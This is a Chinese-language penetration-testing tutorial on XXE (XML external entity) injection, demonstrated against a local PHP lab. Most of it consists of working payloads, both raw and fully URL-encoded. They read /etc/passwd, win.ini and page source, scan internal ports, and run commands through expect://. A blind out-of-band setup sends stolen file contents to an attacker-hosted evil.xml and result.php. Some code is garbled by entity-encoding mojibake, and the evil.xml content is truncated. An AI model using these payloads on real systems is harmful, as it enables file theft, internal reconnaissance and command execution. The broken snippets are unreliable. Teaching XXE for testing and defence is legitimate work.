95.网络安全渗透测试—[常规漏洞挖掘与利用篇11]—[XXE(XML外部实体)注入漏洞与测试]

我认为&＃xff0c;无论是学习安全还是从事安全的人&＃xff0c;多多少少都有些许的情怀和使命感&＃xff01;&＃xff01;&＃xff01;

一、XXE注入

1、相关概念

&＃xff08;1&＃xff09;XXE定义&＃xff1a;

          XXE Injection即XML External Entity Injection,也就是XML外部实体注入漏洞&＃xff0c;该漏洞是在对非安全的外部实体数据进⾏处理时引发的安全问题。

&＃xff08;2&＃xff09;漏洞版本&＃xff1a;

          libxml的版本

&＃xff08;3&＃xff09;相关概念&＃xff1a;

• 在程序用的比较多就是内部实体

<!ENTITY 实体名称 "实体的值">


xml version&＃61;"1.0" encoding&＃61;"ISO-8859-1"?><note><to>George</to><from>John</from><heading>Reminder</heading><body>Don&＃39;t forget the meeting!</body></note>


• 外部实体可支持http、file等协议 不同程序支持的协议也不同。

<!ENTITY 实体名称 SYSTEM "URI/URL">


$string_xml &＃61; &＃39;GeorgeJohnReminderxml实体注入&＃39;;$xml &＃61; isset($_GET[&＃39;xml&＃39;])?$_GET[&＃39;xml&＃39;]:$string_xml;$data &＃61; simplexml_load_string($xml);echo &＃39;&＃39;;print_r($data);
?>


$xml &＃61; $_GET[&＃39;xml&＃39;];$data &＃61; &＃64;simplexml_load_string($xml);
?>


2、漏洞示例&＃xff1a;有回显的XXE注入

&＃xff08;1&＃xff09;靶机环境&＃xff1a;本地的phpstudy-php5.4.5

//注意&＃xff1a;5.2.17不能成功演示

&＃xff08;2&＃xff09;漏洞页面源码&＃xff1a;xxe01.php

&＃xff08;3&＃xff09;查看libxml版本&＃xff1a;2.7.8<2.9

&＃xff08;4&＃xff09;任意读取文件&＃xff1a;file://伪协议

payload-linux&＃xff1a;<?xml version&＃61;"1.0"?><!DOCTYPE a [<!ENTITY b SYSTEM "file:///etc/passwd">]><c>&b;</c>
//注意&＃xff1a;payload需要url编码后才可使用payload-windows&＃xff1a;<?xml version&＃61;"1.0"?><!DOCTYPE a [<!ENTITY b SYSTEM "file:///C:/Windows/win.ini">]><c>&b;</c>
//注意&＃xff1a;payload需要url编码后才可使用


示例-1&＃xff1a;http://www.exploit.cool/exp/xxe/xxe01.php?xml&＃61;%3C%3F%78%6D%6C%20%76%65%72%73%69%6F%6E%3D%22%31%2E%30%22%3F%3E%3C%21%44%4F%43%54%59%50%45%20%20%61%20%20%5B%3C%21%45%4E%54%49%54%59%20%62%20%53%59%53%54%45%4D%20%22%66%69%6C%65%3A%2F%2F%2F%43%3A%2F%57%69%6E%64%6F%77%73%2F%77%69%6E%2E%69%6E%69%22%3E%5D%3E%3C%63%3E%26%62%3B%3C%2F%63%3E

如下图所示&＃xff0c;成功读取了c:/windows/win.ini文件内容&＃xff1a;

&＃xff08;5&＃xff09;利用伪协议读取文件&＃xff1a;php的filter伪协议

payload-3:
<?xml version&＃61;"1.0" encoding&＃61;"utf-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY >
<!ENTITY xxe SYSTEM "php://filter/read&＃61;convert.base64-encode/resource&＃61;xxe01.php" >]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>
//注意&＃xff1a;payload需要url编码后才可使用


示例-2&＃xff1a;http://www.exploit.cool/exp/xxe/xxe01.php?xml&＃61;%3c%3f%78%6d%6c%20%76%65%72%73%69%6f%6e%3d%22%31%2e%30%22%20%65%6e%63%6f%64%69%6e%67%3d%22%75%74%66%2d%38%22%3f%3e%20%0a%3c%21%44%4f%43%54%59%50%45%20%78%64%73%65%63%20%5b%0a%3c%21%45%4c%45%4d%45%4e%54%20%6d%65%74%68%6f%64%6e%61%6d%65%20%41%4e%59%20%3e%0a%3c%21%45%4e%54%49%54%59%20%78%78%65%20%53%59%53%54%45%4d%20%22%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%72%65%61%64%3d%63%6f%6e%76%65%72%74%2e%62%61%73%65%36%34%2d%65%6e%63%6f%64%65%2f%72%65%73%6f%75%72%63%65%3d%78%78%65%30%31%2e%70%68%70%22%20%3e%5d%3e%0a%3c%6d%65%74%68%6f%64%63%61%6c%6c%3e%0a%3c%6d%65%74%68%6f%64%6e%61%6d%65%3e%26%78%78%65%3b%3c%2f%6d%65%74%68%6f%64%6e%61%6d%65%3e%0a%3c%2f%6d%65%74%68%6f%64%63%61%6c%6c%3e

如下图所示&＃xff0c;成功读取了xee01.php页面源码的base64编码&＃xff1a;

得到的base64源码解码后&＃xff1a;

&＃xff08;5&＃xff09;扫描端口&＃xff1a;单线程

payload&＃xff1a;
<?xml version&＃61;"1.0"?>
<!DOCTYPE ANY [
<!ENTITY test SYSTEM "http://192.168.97.130:80">
]>
<abc>&test;</abc>
//注意&＃xff1a;payload需要url编码后才可使用


示例-3&＃xff1a;http://www.exploit.cool/exp/xxe/xxe01.php?xml&＃61;%3c%3f%78%6d%6c%20%76%65%72%73%69%6f%6e%3d%22%31%2e%30%22%3f%3e%0a%3c%21%44%4f%43%54%59%50%45%20%41%4e%59%20%5b%0a%3c%21%45%4e%54%49%54%59%20%74%65%73%74%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%39%37%2e%31%33%30%3a%38%30%22%3e%0a%5d%3e%0a%3c%61%62%63%3e%26%74%65%73%74%3b%3c%2f%61%62%63%3e

如下图所示&＃xff0c;成功扫描到了192.168.97.130:80服务&＃xff1a;

&＃xff08;6&＃xff09;执行命令&＃xff1a;except://伪协议

except://伪协议封装协议默认未开启&＃xff0c;为了使用 expect:// 封装器&＃xff0c;你必须安装 » PECL 上的 » Expect 扩展。

payload-4&＃xff1a;
<?xml version&＃61;"1.0"?>
<!DOCTYPE ANY [
<!ENTITY test SYSTEM "expect://whoami">
]>
<abc>&test;</abc>
//注意&＃xff1a;payload需要url编码后才可使用


示例-4&＃xff1a;http://www.exploit.cool/exp/xxe/xxe01.php?xml&＃61;%3c%3f%78%6d%6c%20%76%65%72%73%69%6f%6e%3d%22%31%2e%30%22%3f%3e%0a%3c%21%44%4f%43%54%59%50%45%20%41%4e%59%20%5b%0a%3c%21%45%4e%54%49%54%59%20%74%65%73%74%20%53%59%53%54%45%4d%20%22%65%78%70%65%63%74%3a%2f%2f%77%68%6f%61%6d%69%22%3e%0a%5d%3e%0a%3c%61%62%63%3e%26%74%65%73%74%3b%3c%2f%61%62%63%3e

3、漏洞示例&＃xff1a;无回显的XXE注入

//无回显的XXE注入称为 blind xxe &＃xff0c;此时可以使用外带数据通道提取数据

&＃xff08;1&＃xff09;靶机环境&＃xff1a;本地的phpstudy-php5.4.5

&＃xff08;2&＃xff09;漏洞页面源码&＃xff1a;xxe01.php

&＃xff08;3&＃xff09;查看libxml版本&＃xff1a;2.7.8<2.9

&＃xff08;4&＃xff09;任意读取文件&＃xff1a;blind xee

【首先&＃xff1a;攻击者远程WEB服务器上的提前准备&＃xff1a;】

evil.xml 文件内容&＃xff1a;读取xee blind发来的文件内容并且通过file参数传递给result.php

<!ENTITY % all "">


result.php文件内容&＃xff1a;读取evil.xml发来的file参数值并且写入到result.txt文件内

file_put_contents("result.txt", $_GET[&＃39;file&＃39;]);?>


【其次&＃xff1a;攻击者提交的payload&＃xff1a;】

payload-5&＃xff1a;
<?xml version&＃61;"1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///C:/flag.txt">
<!ENTITY % remote SYSTEM "http://www.exploit.cool/exp/xxe/evil.xml">
%remote;
%all;
]>
<root>&send;</root>
//注意&＃xff1a;上面的该条语句是在读取文件内容&＃xff0c;同时其内的内容需要符合一定条件才出结果
//注意&＃xff1a;上面的http://www.exploit/cool/exp/xxe/evil.xml该条语句模拟的是攻击者的远程服务器的文件
//注意&＃xff1a;payload需要url编码后才可使用


示例-5&＃xff1a;http://www.exploit.cool/exp/xxe/xxe02.php?xml&＃61;%3c%3f%78%6d%6c%20%76%65%72%73%69%6f%6e%3d%22%31%2e%30%22%3f%3e%0a%3c%21%44%4f%43%54%59%50%45%20%41%4e%59%5b%0a%3c%21%45%4e%54%49%54%59%20%25%20%66%69%6c%65%20%53%59%53%54%45%4d%20%22%66%69%6c%65%3a%2f%2f%2f%43%3a%2f%66%6c%61%67%2e%74%78%74%22%3e%0a%3c%21%45%4e%54%49%54%59%20%25%20%72%65%6d%6f%74%65%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%77%77%77%2e%65%78%70%6c%6f%69%74%2e%63%6f%6f%6c%2f%65%78%70%2f%78%78%65%2f%65%76%69%6c%2e%78%6d%6c%22%3e%0a%25%72%65%6d%6f%74%65%3b%0a%25%61%6c%6c%3b%0a%5d%3e%0a%3c%72%6f%6f%74%3e%26%73%65%6e%64%3b%3c%2f%72%6f%6f%74%3e

【注意&＃xff1a;经过多次测试&＃xff0c;发现我们读取的内容&＃xff0c;不能出现一些特殊字符&＃xff0c;否则不会出现结果&＃xff01;&＃xff01;&＃xff01;】